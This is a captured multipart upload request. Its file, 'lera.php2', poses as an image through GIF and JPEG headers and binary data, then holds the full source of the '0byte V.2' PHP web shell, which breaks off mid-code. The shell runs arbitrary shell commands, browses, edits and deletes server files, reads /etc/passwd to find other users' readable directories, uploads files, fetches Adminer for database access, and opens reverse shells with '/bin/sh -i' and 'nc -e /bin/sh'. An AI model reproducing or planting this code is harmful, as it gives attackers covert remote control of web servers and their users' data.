------WebKitFormBoundary5SePZ93NyvO6nCmJ
Content-Disposition: form-data; name="qqfile"; filename="lera.php2"
Content-Type: application/octet-stream

GIF89a;
ÿØÿà JFIF      ÿí „Photoshop 3.0 8BIM     hg Js4XT_wSZ67ehRpQTnMQ( JFBMD0f000770010000cd1d00002b54000065550000ec560000e488000080b80000b1bb0000ÿÛ C 

	


")$+*($''-2@7-0=0''8L9=CEHIH+6OUNFT@GHEÿÛ C

!!E.'.EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEÿ  €" ÿÄ             ÿÄ            ÿÚ     ù	úȉ{j                  êv $àiwžœöˆ'Ýœ«§ôåÝU	>À [T€ÕôuÕæÈúWÃúþÀ               Iô1óËî£;˜‘ò8ØN¸£•w@cŽºóê¶'»6r´G[É]X«§=&5³uÝ÷mqÖÑSÞœX†,†,†,†,†,†,†,†,†,†,†,†,†,†,†,†,†,†,†,†,†,†,†,†,†,†,†,†,†,†,†,†,†Zò²²²²²²‹@                                                          ŸMöóù‹éy3÷ëûOcõjSƒvQÎSÞŸ9yWI$ä`äÝO‡/çWyå¼ã›Ï¸ëSãý+ƒ §e,/~™}_^Ç*—~IM•ÇЫäÞý¿yð—ÞðO;šƒ›ÊoCŸ¿c_ÇëüYÈåmѧíö=%÷Ä¢^EΫW•Y±ýÊöZm.läýúlûŸ‘cÛòóP=Ÿ™Zé<9Ï%âGoÈŠ›é<@MÆ>§—›;yüÇn1;v‰626,=V~”qú<‘ušã’ëÑ/1íä5¯…a6=|å¹ìy~Õž[æ?Sù[Yyˆëûn#®>{fŒ§ì…¹wýú&³>F­Úžã–'Íj,*³¨½75œ½õG¦Ëêè>¯¹IdÔy=ùbØïËTi°¸u—†ì8t¬ºÃfmmíEÞ„K
óãøî×çÙé;d’Þå·s<†½»»)<ãû,–œ˜ùì}Sg'¿¿Ÿ§ÆŠÆ[yò nÓ¼õïµç¯CÑæèÂP­Ño®)4ôå‹ÓÕÚ¯?òÿ ªry×»¤–fÚý‹ï¾!‹Â_Ô~GosöѤë9a³ùU
Ç;c¯tyí=óѳXßcQ'¦-Ú6z|ùA™–ì)îjyïWMÌõü·KqMu¬ôÖPlºg“ù¯×ø\o™›/T½dÍ6lü×fZÚóÍ{#\yž,/dhWºý°·eßÏË%•·ÓUô;Ÿ“g¼“[ ¾÷›ò:Uâá_¼‘‹Ó¥ÛeNuWɨ3­Ð¼ò\½%ÌðÇ|5µ[q†±/
˜j|wèùÌëhvkØJ[eèâÑ7EÌê~Ûå¸]w+Ùsß;qWmsÕÙ×ÙîRpýßÌ%¼ÓY/.Žâ¶ïO™Déêó®s)q%Ù”t²±ÕÕ·ìùyŸ>>ûìÖüwâCÛŽÆ|d<÷/L<Ø]¦øUF¼î&'=Þµrý„i¯—Bî¹¼©qݯ;Ã<6K“Á™Œdê·jGuÀ};Y¶¾^¹ü¾³èU¸×Ï´^Àãß
=44 ÂNç[ß5Ÿ}ó™oUyèä‰>¹Ï§¹¬ç¸¿Üòß/k]hÏSg]iµWÍ>£óLX;6d½uå-þ§â-ÍlLµÍA¯é}ι:zùj|ߢ_¶åæ]üþ=K+Ìõš3Çaæ^z2óÐôyæ^²ðÇ̼1{âÉ“¢C\ßÏûÎ*øýw/iËuëÁëÁ²ÂìîoѾwô=N’4½=8ÒÓ¡çuË´ñûaèÙ6¦¾ãzñ®Ç~®¼±ó<u-.¡Xû<ºâN†“klôsÝgyÅw<wÌσ`u6u¶{þaõO˜æéÙâ:»ú;ý(àÛÁÖ9jžŽ“žâfÆjdŠ…–Уí—ê™y—n>=öYQ·Â6çŽc×£Ð2½ðyèó¼<Ç"ÉߣrÕstIiù.î¢>x;ÅîÕÓäß2Âty|úïúGÎ>§¼YF“¯
È’ôç§/:,¿º²Vɲ(úlwÏåñ>‹O×—«£ÑÛ”©ºvý,˜øÔݺdðëæ¾=SÙW[YÑÙÖÙjiù§Ô¹y®C.†$Yô4WÚ Ú@²‚‹§çña¥ã,/&zWD´‰5õŒ±Ë·6éÝ.ØÛ4›rÇ3ÐzAàz<óу"ÊÏÈgŒ¸G›”¼ß7ô­-p6Ý”¼¹çQéñFϧ=ô¼vïžq¤ÅܯӶ'>”òr‰âöa*¦L·’+%±¾DûO»7½”ÁîøOg—´gRæóÆáôu6wKade¦ÞÓÝsD¼cfaqMth®¸†SÐvÚ£‰uÐcŸÆßFuG_yX}C/=ëÏ
ºó—diI9yéï¾z   <ôxW¾~6K†ÍûåÓ¿!–xì=÷OL¢6cו3¹¼ôÙ¯Ù%­;fñÙ×^v㵎žüdgEËçßB×¼ü~/}Âk2¬kìµ2±‡mǧ;:¾É/ìël«me¥maŽÂ@µ­²\ [×pŠGõ­2Ã^³(›õ–Ï=¦Í[eò.íd¿|ô{ç    z,¯=Ù5~^Ç¢½ô2Ù†p÷gî#6Ô.o«ä¸öª<'®tʾ§é•¾¯=•g?3Rân­Õ/~½¬ú#Îs£ÀùL¾§šíÎEµm§=r¶,K»:Ë3lƒÜ’¾ÆåÝ|3ÖDÖÏÃ6bš´I×^û秛ônšÑ†ÜO¾z=óÐ  Я|¶êË:ÏÝ#w¾l<^áéëAŠå­…˜sG1Ç·?®LŸ7£G¯g³Ç3›è¹­gËÝdØS‰4íL˜ú5ìÒ{Íôšu8ë3²ç§×ØÙsgWfoƒ:†^ed)‘e,ˆ“bù‘1ó?0Ù‰«^ívaïž™nײjÌÒG¾z=óÐ  ЯpñwéÎfl}Û½5gèôcž³<ZI>hÀÏÍ^ÖTöÚq¾RöfR±Ë¼¤UMÓ›+
º	2"nY;aäKö)a„|ÌòÓ´ãkz8%Õm•Í½¥M©"¸¦Dß«j̉.)“Òcæ^ãž&¼6áQÞz›vc”Ô=šö¦×žžïƒ×ƒ×ƒ×ƒ&%=ÌÛ»^üë/™<ôyèÃVQ„-ÕD¹4ö¦ü°ôÊ$˜$KNK¯2Ã=ZÌI”ÖyÔ½9hY9éÍvç§a–!t]LÙn ®¯»ª(¬«,®m-ªíjDYQcÁdm˜dM&:ûžeáŽ9xa¯n²Xe©+-{3¨;ôo³?qÊø=yè  ûž½¦ì±Ù=÷ÓܼÀË^™èzAÑC(m«,Íž{‰–ºJkÍ2O`Í¢³EµY¾³Et¹gå+$l‹´ßž­¢¶Ú¼Ûº¿s2àOŒr–uÖzÍ•­E¹"<ˆæ>ùêhÇ,	úwjW¾zžy—†8çá†ëHáž’žjΣÈ&ç?qôõàõâ_^^^}ÇÕ÷||ɹDÛn÷ÌÃ/O^j6jÕ¨k•¸å­4ïìôÇTÍf¬ â¶ß/OnsUW|ÏAô™ùŸNm©îýy› ËˆTϬ±IúvéNRÒ®×Y°¶¨¶$èݤÇß=MZwÇ,uç¨×çúS…Èíü㥺ã=yêJ¿Fn‰påÙŸ¸z{î>ž¼¼¼¼1õ¬·ã*\}ÛŽožâ6{€Éæg¹éÒJÓ£Ly|zöXóÕ™ßYËÕÁƽž¹pÇ,N’Öžû¯>¡¯×÷¾ãž³·v.r÷©£|bªd-õe†&y‹:›{™¶ôÖĽ;u˜{á0¾)c«f³çg'×ú¶ˆ®ñNVo…Uç¯mJÑ–ƒTÈS}ÇÓßqö=x=x=x=x=÷Vný;ecîÜëN[r5ûž&:öº¬=+¥Ëôƒó?©|Ã:‹Ž¬üþœôg£;kÕ†ñ»Í;7Ï¡é9Γ¦3Ãf»%nÃlmϬõ§±%WÕtÚûDß[qªÎ:ö¢ÚæUÅ5Á/°1ð5Å•²×ù×WÍt%ûÜSÌ}òÏ0Ï]p™üåË·Ò5|ð¿A‘óaô§ÍGÒ½ù ú[æƒéoš¥¾h>–ù ú^1/Õòù0úÎ#G×qù úÃäãëyü„}/¯êù/‡Õ9nT]m ó¿ÓOä½u‡ Ö{ìx?S»ÝóÕ}óŸkéÙ|Çú†_-R|·Óê0¾v®Ö_}//šxv2ø/dú
‡ËGÖ_&W| }V'ÍGÕ}ùHëí>x>¯çÊGÕŸ)GÕqùb½`                            !ž‘Òt GHÒt™7«%•«!Z²«!Z²«!Z²«!Z²«!Z²«!Z²«!Z²«!Z²«!Z²­Ø3333333333333¡k—¯’u£’u£’u£’u£’u£“è&5Æ"[\b%ˆ‰b"Xˆ–"%ˆ‰b"Xˆ–"%ˆ‰b"Xˆ–"%ˆ‰b"Xˆ–"%ˆ‰c×ÙŽ1ÙŽ1ÙŽ1ÙŽ1ÙŽ1ÙŽ1ÙŽ1ÙŽ1ÙŽ1ÙŽ1ÙŽ1ÙŽ1ÙŽ1Ù€ )ìMí;€     ‰‘šd  WJ7€               5Íq¦4$•mɪÒblJûcdZúÓéœ×CÏš'èÒd œXXÂÐY×i–Næ$Ä;kŠÒ.4Ç+Ð’4Tj,zJi†uÒ®@                ä <ôyè1È 9Ï@äzr cç                 
;©Ë\áA.ãrÛέG‰|åî‰ÈS@                         SÜ^·º¡ Ié12ïÇ¿¸È‡3Ï@                          §µ3!@<=yè ÃÔ9€ÀÍH  Dе“HdÀÄ             –ê°ö¿TRF°‹9”ÞùQôåF¨´çYŽÆÝUFî‡çÿ @8{¬9âö
eéa_¸h•Œ2æG-Ñ6À„M¢ys„j‚Æ]©×rýGn—ÉÙ“çÒX               rrY 1d ¢¼ôyèãÐ ä=är Œ9Úé@              IÎ^Yy¶Œîœôbúg1<¸s°Î¹Éô$µ.¢ýÊm:g'd]B©€vJZã«SzYã›;5ƒ¦s™šÀê!G©:·5 ½QV{ŸÒtÎg¡6¹I¥ó”ÚtÎkYÐI¥º          _`>y+·ôå w.¯ âs::üNã£ä»Æìë¼9º^ÿ AÉ{+¥8Ýߧ!CôÜNOÀAæ»LNÞóœÇ§9ËèYùμqº;N[Eéó½HðæúPâr»¹>wi×dsUý=AïH             
ô	á
h!“ 
h „M ,ÉDbK^À‡0                e N…¸¾ÆBl¨ÒÈ7ìÓf"ûŸ¸(er–fWÔYö|ñWŸ5r\m ¾Ó§QâžqmËÝÓúkàÞc@_aKК¤êô÷fª‚ßÝ4ÇЀ              xôc 9 äyŽAç£ÏAŽCÇ¡Ž@ W£Ç              eQYóSK…#ªr3ŽÌôÄ)¼E±ÐãËG:­uµ‡dæ§í\ñÓ9;ñÍzt‘*v38^ ²sðαÎút.r!×9¹e„žG#¬rsÌÍ.TUÇ\äý:·-b\)î           Ez8Ÿ{\N&Ï¥ç=ôAó¤yéÍT÷cæ]WéËÖw~œt~çMJ9¼:qó™ý®GkÒäsžtƒ›tƒš¥ïü8ùÝã¦Í°8Kîsp;:r—ÎÄq6½ù·KÒoWSáÇö>z           ))†’H"i”ÃI%Ž@     Bš   w™€€            W´DyT³ÌfQxZE§é
¹hÞGßQ<…g¨êôBØiÛßå$ó^r<$@®®:Ï#î0—S(Ï^ÈEäZ襔(EÖ0eǯ¯-6CZèªØMe‰£dJ“§¸å;p             1È<ô @ <z c†U cñècAŽAŽ@Y             afäìË—?êÜœ£¢TU_œ×HE™ÂÞ—®w¤RW[žð豋͋”ÚtÎna/w)8èsæî	ŽzAråw™ÌèÔN.'§7I¤†túèa4ž_"æob_€           Q^Žn·¶ðámºONn`8|;œŽo¢È|âǶ^}xâ*þ›‰ËîéOs‰óË^»#™ƒÚxp’{1ÈuáÊEíÍm;\Žn'_JUTu¶çÖXxsžt£‹Ï±Äáàý#Ãœt€            E%0Ì     
X›ÀBš     ŒI               Šöˆ6‹ym¶’Ä€%F­ô§¤ˆØÐÞR_›q‹‰ÍôœÑ>o9™.Î’XßËÚ=/9Ñžr<$@®®:Ï#î%Á‰¤°Ë_›%ò–äü<¨,0¢˜MH4Âôºò³Y»\œŒôÐë>          ä Ž@9 *t^†99 1È Ž@rrr9r )í²ä <ô          óÚRçÞgQÕ¹ìK™4ÂçÞgQ}7—š]«)έG èܶGN ˆ^Íãå,I\9Ý9èÇUž¸í\î'Hæ5VŽNؾ‰+‡;§=ê¡Ó׫Èè¾Ã¤s9Ÿè            	㊧úXãö[[í¬ñÅSý,q¶ ¢«¾˜qÛ;LNqÒŽ>“éxœUŸH1â;œNWÐq9½ æùï¢âq½ ã¤uÎ#¹Äáu}˜ÛÒnèŸ;¾êÍîzꂳ«óÐ               ò!0 ä †`                     
Ë:"@•·Òvþ›¨ìëK+sÒú=f¢D†ãD¬a—29nˆ ·…¼‡æÒ<îwis®óD½uD­Ôgœ>o¤                  ä ccñèÇ ƒÇ£ÏCƒƒE}¸Ç                   %³œ–\F¨€u{(ôœ[eÌJ/aSh:ÕF%Ë–œ]¨"S””t0è0:íTVdüe¡~æEÌÞ*Ø¿Q êöQè:77dY               Háäõãçø}#¯úävu9u}‡‡Î,ûOJ-AI‡g‘ÉHé=9ªžì|Ë£ê29»Yã‹ÝäpvýG·«ðà0úG_ôÇXt                ¤¦‚4 ¤€ <=F’ 
h
h ŠJ!@               Šöˆ¯µ¦ÖYWÀ½7DÓHu‘`f]é×F\k¥èˆöá—_hr6üÎÂß\AkŸ=,•¯d"ò-tSe¶º’Âo!ÐåÔÊ2ƒX:}õX–÷§V
<?php /* 0byte V.2 PHP Backdoor - www.zerobyte.id */ set_time_limit(0); error_reporting(0); error_log(0); function exect($cmd) { if(function_exists('system')) { @ob_start(); @system($cmd); $exect = @ob_get_contents(); @ob_end_clean(); return $exect; } elseif(function_exists('exec')) { @exec($cmd,$results); $exect = ""; foreach($results as $result) { $exect .= $result; } return $exect; } elseif(function_exists('passthru')) { @ob_start(); @passthru($cmd); $exect = @ob_get_contents(); @ob_end_clean(); return $exect; } elseif(function_exists('shell_exec')) { $exect = @shell_exec($cmd); return $exect; } } function fperms($filen) { $perms = fileperms($filen); $fpermsinfo .= (($perms & 0x0100) ? 'r' : '-'); $fpermsinfo .= (($perms & 0x0080) ? 'w' : '-'); $fpermsinfo .= (($perms & 0x0040) ? (($perms & 0x0800) ? 's' : 'x' ) : (($perms & 0x0800) ? 'S' : '-')); $fpermsinfo .= (($perms & 0x0020) ? 'r' : '-'); $fpermsinfo .= (($perms & 0x0010) ? 'w' : '-'); $fpermsinfo .= (($perms & 0x0008) ? (($perms & 0x0400) ? 's' : 'x' ) : (($perms & 0x0400) ? 'S' : '-')); $fpermsinfo .= (($perms & 0x0004) ? 'r' : '-'); $fpermsinfo .= (($perms & 0x0002) ? 'w' : '-'); $fpermsinfo .= (($perms & 0x0001) ? (($perms & 0x0200) ? 't' : 'x' ) : (($perms & 0x0200) ? 'T' : '-')); echo '<center><small>'.$fpermsinfo.'</small></center>'; } function eof() {echo "\x77\x77\x77\x2e\x7a\x65\x72\x6f\x62\x79\x74\x65\x2e\x69\x64";} ?> <title>0byteV2 - PHP Backdoor</title> <link href='//fonts.googleapis.com/css?family=Share+Tech+Mono' rel='stylesheet' type='text/css'> <style type="text/css"> body { font-family: courier; background: #000d1a; color: #e8f5e9; font-size: 1px; } h1 a { font-weight: normal; font-family: 'Share Tech Mono'; font-size: 20px; color:#27f6a4; text-decoration: none; margin: 0px; } h2 { font-size: 20px; color: #27f6a4; text-align: center; padding-top: 5px; margin: 0; margin-top: 10px; } .menu { text-align: center; font-size: 12px; border-bottom: 1px dashed #27f6a4; padding-bottom: 5px; margin-bottom: 10px; } .menu a { margin-top: 2px; color: #27f6a4; text-decoration: none; display: inline-block; } .container { font-size: 12px; } .filemgr { font-size: 12px; width: 100% } .filemgr td { padding: 3px; border-bottom: 1px dashed #27f6a4; } .filemgr a{ text-decoration: none; color:#27f6a4; } tr:hover { background: #003366; } .nohover:hover { background: transparent; } .tdtl { background:#27f6a4;color:#000d1a;text-align:center;font-weight:bold; } .footer { text-align: center; border-radius: 30px; margin-top: 25px; border-top: 1px double #27f6a4; padding: 5px; } .footer a { color: #27f6a4; text-decoration: none; } p { word-wrap: break-word; margin:2; } a { text-decoration: none; color: #27f6a4; } .act { text-align: center; } .txarea { width:100%; height:200px; background:transparent; border:1px solid #27f6a4; padding:1px;color:#27f6a4; } h4 { margin:0; } .yyy { background: transparent; color: #27f6a4; border: 1px #27f6a4 solid; padding: 2px; } .xxx { color: #000d1a; background: #27f6a4; border: 1px #27f6a4 solid; padding: 2px; } </style> <div class="container"> <div style="position:relative;width: 100%;margin-bottom: 5px;border-bottom: 1px dashed #27f6a4;"> <div style="float: left;width: 15%;text-align: center;border: 1px dashed #27f6a4;margin-bottom: 5px;"> <h1><a href="?">0byte V.2<br><small>PHP Backdoor</small></a></h1> </div> <div style="float: right;width: 83%;"> <?php echo php_uname(); if(preg_match('/\b\d{4}\b/', php_uname("v"), $matches)) { $year = $matches[0]; $url = "https://www.google.com/search?q=%22".php_uname("s")."%22+%22".php_uname("r")."%22+%22$year%22+%22Exploit%22"; echo " <a href=\"$url\" target=\"_blank\">[ FIND EXPLOIT ]</a>"; } $mysql = (function_exists('mysql_connect')) ? "<font color=#27f6a4>ON</font>" : "<font color=red>OFF</font>"; $curl = (function_exists('curl_version')) ? "<font color=#27f6a4>ON</font>" : "<font color=red>OFF</font>"; $wget = (exect('wget --help')) ? "<font color=#27f6a4>ON</font>" : "<font color=red>OFF</font>"; $perl = (exect('perl --help')) ? "<font color=#27f6a4>ON</font>" : "<font color=red>OFF</font>"; $gcc = (exect('gcc --help')) ? "<font color=#27f6a4>ON</font>" : "<font color=red>OFF</font>"; $disfunc = @ini_get("disable_functions"); $show_disf = (!empty($disfunc)) ? "<font color=red>$disfunc</font>" : "<font color=#27f6a4>NONE</font>"; echo '<br>[ MySQL: '.$mysql.' ][ Curl: '.$curl.' ][ Wget: '.$wget.' ][ Perl: '.$perl.' ][ Compiler: '.$gcc.' ]'; echo '<p>Disable Function: '.$show_disf; ?> </div> <div style="clear: both;"></div> </div> <?php if(empty($_GET)) { $dir = getcwd(); } else { $dir = $_GET['path']; } if(!empty($_GET['path'])) {$offdir = $_GET['path'];} else if(!empty($_GET['file'])) {$offdir = dirname($_GET['file']);} else if(!empty($_GET['lastpath'])) {$offdir = $_GET['lastpath'];} else {$offdir = getcwd();} ?> <div class="menu"> <a href="?ext=usersreadblepath&lastpath=<?php echo $offdir;?>">[ Readable Users Path ]</a> <a href="?ext=sql_interface&lastpath=<?php echo $offdir;?>">[ SQL Interface ]</a> <a href="?ext=shellcmd&lastpath=<?php echo $offdir;?>">[ Shell Command ]</a> <a href="?ext=reverseshell&lastpath=<?php echo $offdir;?>">[ Reverse Shell ]</a> <a href="?ext=vdomain&lastpath=<?php echo $offdir;?>">[ Shows vDomain ]</a> <a href="?ext=uploader&lastpath=<?php echo $offdir;?>">[ Uploader ]</a> </div> <?php echo '<div style="margin-bottom:10px;">'; echo '<span style="border:1px dashed #27f6a4;padding:2px;">'; $lendir = str_replace("\\","/",$offdir); $xlendir = explode("/", $lendir); foreach($xlendir as $c_dir => $cdir) { echo "<a href='?path="; for($i = 0; $i <= $c_dir; $i++) { echo $xlendir[$i]; if($i != $c_dir) { echo "/"; } } echo "'>$cdir</a>/"; } echo '</span></div>'; if(!empty($dir)) { echo '<table class="filemgr">'; echo '<tr><td class="tdtl">Name</td><td class="tdtl" width="9%">Permission</td><td class="tdtl" width="18%">Action</td></tr>'."\n"; $directories = array(); $files_list = array(); $files = scandir($dir); foreach($files as $file){ if(($file != '.') && ($file != '..')){ if(is_dir($dir.'/'.$file)){ $directories[] = $file; } else{ $files_list[] = $file; } } } foreach($directories as $directory){ echo '<tr><td><span class="dbox">[D]</span> <a href="?path='.$dir.'/'.$directory.'">'.$directory.'/</a></td>'."\n"; echo '<td>'; fperms($dir.'/'.$directory); echo '</td>'."\n"; echo '<td class="act">'; echo '<a href="?action=rename&file='.$dir.'/'.$directory.'" class="act">RENAME</a> '; echo '<a href="?action=rmdir&file='.$dir.'/'.$directory.'" class="act">DELETE</a>'; echo '</td>'."\n"; echo '</tr>'."\n"; } foreach($files_list as $filename){ if(preg_match('/(tar.gz)|(tgz)$/', $filename)) { echo '<tr><td><span class="dbox">[F]</span> <a href="#" class="act">'.$filename.'</a>'."\n"; echo ' <a href="?ext=extract2tmp&gzname='.$dir.'/'.$filename.'" style="background:#27f6a4;color:#000d1a;padding:1px;padding-left:5px;padding-right:5px;">EXTRACT TO TMP</a>'; echo '</td>'."\n"; echo '<td>'; fperms($dir.'/'.$filename); echo '</td>'."\n"; echo '<td class="act">'; echo '<a href="?action=rename&file='.$dir.'/'.$filename.'" class="act">RENAME</a> '; echo '<a href="?action=delete&file='.$dir.'/'.$filename.'" class="act">DELETE</a> '; echo '<a href="?action=download&file='.$dir.'/'.$filename.'" class="act">DOWNLOAD</a>'; echo '</td>'."\n"; echo '</tr>'."\n"; } else { echo '<tr><td><span class="dbox">[F]</span> <a href="?action=view&file='.$dir.'/'.$filename.'" class="act">'.$filename.'</a></td>'."\n"; echo '<td>'; fperms($dir.'/'.$filename); echo '</td>'."\n"; echo '<td class="act">'; echo '<a href="?action=edit&file='.$dir.'/'.$filename.'" class="act">EDIT</a> '; echo '<a href="?action=rename&file='.$dir.'/'.$filename.'" class="act">RENAME</a> '; echo '<a href="?action=delete&file='.$dir.'/'.$filename.'" class="act">DELETE</a> '; echo '<a href="?action=download&file='.$dir.'/'.$filename.'" class="act">DOWNLOAD</a>'; echo '</td>'."\n"; echo '</tr>'."\n"; } } echo '</table>'; } if($_GET['action'] == 'edit') { if($_POST['save']) { $save = file_put_contents($_GET['file'], $_POST['src']); if($save) { $act = "<font color=#27f6a4>Successed!</font>"; } else { $act = "<font color=red>Permission Denied!</font>"; } echo "".$act."<br>"; } echo "Filename: <font color=#27f6a4>".basename($_GET['file'])."</font>"; echo "<form method='post'> <textarea name='src' class='txarea'>".htmlspecialchars(@file_get_contents($_GET['file']))."</textarea><br> <input type='submit' value='Save' name='save' style='width: 20%;background:#27f6a4;border:none;color:#000d1a;margin-top:5px;height:30px;'> </form>"; } else if($_GET['action'] == 'view') { echo "Filename: <font color=#27f6a4>".basename($_GET['file'])."</font>"; echo "<textarea class='txarea' style='height:400px;' readonly>".htmlspecialchars(@file_get_contents($_GET['file']))."</textarea>"; } else if($_GET['action'] == 'rename') { $path = $offdir; if($_POST['do_rename']) { $rename = rename($_GET['file'], "$path/".htmlspecialchars($_POST['rename']).""); if($rename) { $act = "<font color=#27f6a4>Successed!</font>"; } else { $act = "<font color=red>Permission Denied!</font>"; } echo "".$act."<br>"; } echo "Filename: <font color=#27f6a4>".basename($_GET['file'])."</font>"; echo "<form method='post'> <input type='text' value='".basename($_GET['file'])."' name='rename' style='width: 450px;' height='10'> <input type='submit' name='do_rename' value='rename'> </form>"; } else if($_GET['action'] == 'delete') { $path = $offdir; $delete = unlink($_GET['file']); if($delete) { } else { $act = "<font color=red>Permission Denied!</font>"; } echo $act; } else if($_GET['action'] == 'rmdir') { $path = $offdir; $delete = rmdir($_GET['file']); if($delete) { echo '<font color=#27f6a4>Deleted!</font><br>'; } else { echo "\n<font color=red>Error remove dir, try to force delete!</font>\n<br>"; exect('rm -rf '.$_GET['file']); if(file_exists($_GET['file'])) { echo '<font color=red>Permission Denied!</font>'; } else { echo '<font color=#27f6a4>Deleted!</font>'; } } } else if($_GET['action'] == 'download') { @ob_clean(); $file = $_GET['file']; header('Content-Description: File Transfer'); header('Content-Type: application/octet-stream'); header('Content-Disposition: attachment; filename="'.basename($file).'"'); header('Expires: 0'); header('Cache-Control: must-revalidate'); header('Pragma: public'); header('Content-Length: ' . filesize($file)); readfile($file); exit; } if($_GET['ext'] == 'usersreadblepath') { echo '<h2>.::[ Readable Users Path ]::.</h2>'; $potent_dir = array("", "public_html", "backupwordpress", "scriptupdate", "backups", "backup", "www", "fantastico_backups"); $i = 0; $etc = fopen("/etc/passwd", "r"); while($passwd = fgets($etc)) { if($passwd == '' || !$etc) { echo "Can't read /etc/passwd"; } else { preg_match_all('/(.*?):x:/', $passwd, $user); foreach($user[1] as $users) { foreach ($potent_dir as $p_dir) { $chkdir = "/home/$users/$p_dir"; $chkdir2 = "/home/$users/$users/$p_dir"; if(is_readable($chkdir)) { $i++; if(is_writable($chkdir)) { echo "[RW] <a href='?path=$chkdir'>$chkdir</a><br>\n"; } else { echo "[R] <a href='?path=$chkdir'>$chkdir</a><br>\n"; } } else if (is_readable($chkdir2)) { $i++; if(is_writable($chkdir2)) { echo "[RW] <a href='?path=$chkdir2'>$chkdir2</a><br>\n"; } else { echo "[R] <a href='?path=$chkdir2'>$chkdir2</a><br>\n"; } } } } } } if($i == 0) { echo '<br>Readable Users Path Is Empty!'; } else { echo "<br>Total ".$i." Readable Users Path in ".gethostbyname($_SERVER['HTTP_HOST'])."."; } } if($_GET['ext'] == 'vdomain') { echo '<center>'; function vdomain($domaindir) { $domainfile = scandir($domaindir); $i = 0; echo "<table width='80%'>\n"; echo "<tr><th>Domain</th><th>User</th><th>Jump BW</th></tr>"; foreach($domainfile as $domain){ $i++; if(!is_dir($domain) && !preg_match('/^[*.]/', $domain) && !preg_match('/[0-9]$/', $domain)) { $user = exec("ls -l $domaindir$domain | awk '{print $3}'"); echo '<tr><td>'.$domain.'</td><td width="15%" align="center"><small>'.$user.'</small></td>'; if(is_readable("/home/$user/backupwordpress")){ echo '<td width="13%" align="center">Yes</td>'; } else { echo '<td width="13%"><center><font color="red">No</font></center></td>'; } echo '</tr>'; } } echo "</table>\n"; echo "Total $i Domains."; } if(is_readable("/etc/vfilters/")) { $domaindir = '/etc/vfilters/'; vdomain($domaindir); } else if(is_readable("/etc/valiases/")) { $domaindir = '/etc/valiases/'; vdomain($domaindir); } else { echo "<h3 style=\"color:red;\">vDomain Is Empty!</h3>"; } echo '</center>'; } else if($_GET['ext'] == 'extract2tmp') { if (file_exists($_SERVER["DOCUMENT_ROOT"].'/tmp/') && is_writable($_SERVER["DOCUMENT_ROOT"].'/tmp/')) { $tmppath = $_SERVER["DOCUMENT_ROOT"].'/tmp/'; } else if(file_exists(dirname($_SERVER["DOCUMENT_ROOT"]).'/tmp/') && is_writable(dirname($_SERVER["DOCUMENT_ROOT"]).'/tmp/')) { $tmppath = dirname($_SERVER["DOCUMENT_ROOT"]).'/tmp/'; } else if(file_exists('/tmp/') && is_writable('/tmp/')) { $tmppath = '/tmp/'; } else { $tmppath = ''; } if(!empty($tmppath)) { $gzfile = $_GET['gzname']; echo '[FILE] '.$gzfile.'<br>'; echo '-- extract to --<br>'; echo '[TMP] '.$tmppath.'<br>'; $bsname = basename($gzfile); $gzrname = explode(".", $bsname); echo '<form method="post" action="">'; echo '<input name="extract" type="submit" value="EXTRACT">'; echo '</form>'; if(!empty($_POST['extract'])) { exect('mkdir '.$tmppath.$gzrname[0]); $destdir = $tmppath.$gzrname[0]; if (file_exists($destdir) && is_writable($destdir)) { echo "\n".'[EXTRACTED] <a href="?path='.$destdir.'">'.$destdir.'</a>'."\n"; exect('tar -xzvf '.$gzfile.' -C '.$destdir); } else { echo 'FAILED!'; } } } else { echo 'CANNOT EXTRACT TO TMP!'; } } else if($_GET['ext'] == 'shellcmd') { echo '<h2>.::[ Shell Command ]::.</h2>'; echo '<form method="post" action="">'; echo 'terminal:~$ <input name="cmd" type="text" placeholder="echo zerobyte" style="width:300px"/>'; echo ' <input type="submit" value=">>"/>'; echo '</form>'; if(!empty($_POST['cmd'])) { echo '<textarea style="width:100%;height:150px;" readonly>'; $cmd = $_POST['cmd']; echo exect($cmd); echo '</textarea>'; } } else if($_GET['ext'] == 'reverseshell') { echo '<h2>.::[ Reverse Shell ]::.</h2>'; echo '<form method="post">'; echo "<center>"; echo "<table style='border: 1px #27f6a4 solid;'>"; echo "<br><tr class='nohover'><td>PHP</td> <td>:</td>"; echo '<td><input name="rev-php-addr" type="text" placeholder="0.0.0.0" class="yyy"/> '; echo '<input name="rev-php-port" type="text" placeholder="1337" class="yyy" style="width:40px;"/> '; echo '<input type="submit" class="xxx" value="Do!"/></td></tr>'; echo "</table><br><table style='border: 1px #27f6a4 solid;'><tr class='nohover'><td>NC</td> <td>:</td>"; echo '<td><input name="rev-nc-addr" type="text" placeholder="0.0.0.0" class="yyy"/> '; echo '<input name="rev-nc-port" type="text" placeholder="1337" class="yyy" style="width:40px;"/> '; echo '<input type="submit" class="xxx" value="Do!"/></td></tr>'; echo "</table></center>"; echo '</form>'; if(isset($_POST['rev-php-addr'])) { $bindaddr = $_POST['rev-php-addr']; $bindport = $_POST['rev-php-port']; $sock=fsockopen("$bindaddr",$bindport); exect("/bin/sh -i <&3 >&3 2>&3"); } else if (isset($_POST['rev-nc-addr'])) { $bindaddr = $_POST['rev-nc-addr']; $bindport = $_POST['rev-nc-port']; exect("nc -e /bin/sh $bindaddr $bindport"); } } else if($_GET['ext'] == 'uploader') { echo '<h2>.::[ Uploader ]::.</h2>'; echo '<center>'; echo '<form method=post enctype=multipart/form-data>'; echo '<br><br>PATH ['.$offdir.']<br>'; echo '<input type="file" name="zerofile"><input name="postupl" type="submit" value="Upload"><br>'; echo '</form>'; if($_POST["postupl"] == 'Upload') { if(@copy($_FILES["zerofile"]["tmp_name"],"$offdir/".$_FILES["zerofile"]["name"])) { echo '<b>OK! '."$offdir/".$_FILES["zerofile"]["name"].'</b>'; } else { echo '<b>Upload Failed.</b>'; } } echo '</center>'; } else if($_GET['ext'] == 'sql_interface') { echo '<h2>.::[ MySQL Interface ]::.</h2>'; echo '<center>'; $dwadminer = 'https://www.adminer.org/static/download/4.3.1/adminer-4.3.1.php'; $fileadminer = 'z-adminer.php'; function call_adminer($dwadminer, $fileadminer) { $fp = fopen($fileadminer, "w+"); $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $dwadminer); curl_setopt($ch, CURLOPT_BINARYTRANSFER, true); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); curl_setopt($ch, CURLOPT_FILE, $fp); return curl_exec($ch); curl_close($ch); fclose($fp); ob_flush(); flush(); file_put_contents($dwadminer, $fileadminer); } echo '<form 